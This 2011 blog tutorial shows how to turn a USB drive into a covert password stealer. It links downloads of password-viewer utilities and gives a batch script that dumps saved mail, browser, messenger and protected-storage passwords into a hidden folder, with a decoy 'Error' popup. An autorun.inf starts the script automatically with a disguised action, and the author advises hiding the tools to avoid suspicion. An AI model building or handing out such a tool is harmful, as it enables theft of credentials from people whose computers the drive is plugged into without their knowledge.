Sep 9, 2011

Use pen drive as password recovery tool...

USB Password Recovery Tool (Plug usb and recover passwords)


Ok guys... This is a tutorial on how to make an usb Password Recovery Tool that recovers every saved password on the computer that you pluged your usb.
first of all download all these tools
Link:http://www.mediafire.com/?3794is96sgbo4w8
or
http://www.enterupload.com/cc8kqcarp1df/pen_drive_as_password_recover_tool.rar.html

mailpv
mspass
iepv
pspv
passwordfox

Then Extract only the executables in your USB. Then make a new folder in the usb and put them in that folder so it would avoid suspicion, then in that folder make another folder which would contain the passwords.
like this


Code:
G:\"Folder which contains the tools"\"folder which passwords will be extracted"

Now to make the Password Recovery Tool in batch

Here is the code (you must modify to work)

Code:
@echo off
msg *  Error
start "folder the tools contain"/mspass.exe /stext "folder the tools contain"/"Folder that will contain the passwords"/mspass.txt

start "folder the tools contain"/mailpv.exe /stext "folder the tools contain"/"Folder that will contain the passwords"/mailpv.txt

start "folder the tools contain"/iepv.exe /stext "folder the tools contain"/"Folder that will contain the passwords"/iepv.txt

start "folder the tools contain"/pspv.exe /stext "folder the tools contain"/"Folder that will contain the passwords"/pspv.txt

start "folder the tools contain"/passwordfox.exe /stext "folder the tools contain"/"Folder that will contain the passwords"/passwordfox.txt
msg * Press ok to continue

Replace the "..." with your path

Write this in notepad and save it to launch.bat
__

now making the Autorun file

Code:
[autorun]

open=launch.bat

ACTION= "your action here"

replace the "..." with your own custom fake command

write it in notepad and save it as autorun.inf
(If the autorun doesn't work on some computers, its because your usb doesn't support it or autorun its disabled on the comp.

Hope you enjoyed and liked it.

No comments:

Post a Comment